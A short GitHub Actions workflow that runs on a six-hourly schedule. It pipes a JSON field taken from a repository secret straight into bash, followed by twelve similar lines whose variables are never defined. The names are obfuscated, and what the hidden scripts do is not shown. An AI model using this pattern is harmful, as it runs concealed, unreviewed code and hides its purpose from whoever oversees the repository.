name: zhegexianre

on:
  workflow_dispatch:
  schedule:
    - cron: '51 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhegexianre
        env:
          knjv662: ${{ secrets.knjv662 }}
        run: |
          echo $knjv662 | jq -r .xz2669 | /bin/bash
          echo $mj9282 | jq -r .rd31 | /bin/bash
          echo $ffli516 | jq -r .p86 | /bin/bash
          echo $mx6872 | jq -r .hwtpa470 | /bin/bash
          echo $wzmx79 | jq -r .lnf923 | /bin/bash
          echo $kug6 | jq -r .h95 | /bin/bash
          echo $jy727 | jq -r .esqpl81531 | /bin/bash
          echo $ai2287 | jq -r .x86776 | /bin/bash
          echo $bb86403 | jq -r .lpucs467 | /bin/bash
          echo $fah664 | jq -r .sieg087 | /bin/bash
          echo $dfto539 | jq -r .xn86 | /bin/bash
          echo $ar108 | jq -r .br91565 | /bin/bash
          echo $gdgxw6 | jq -r .ujwrr6154 | /bin/bash

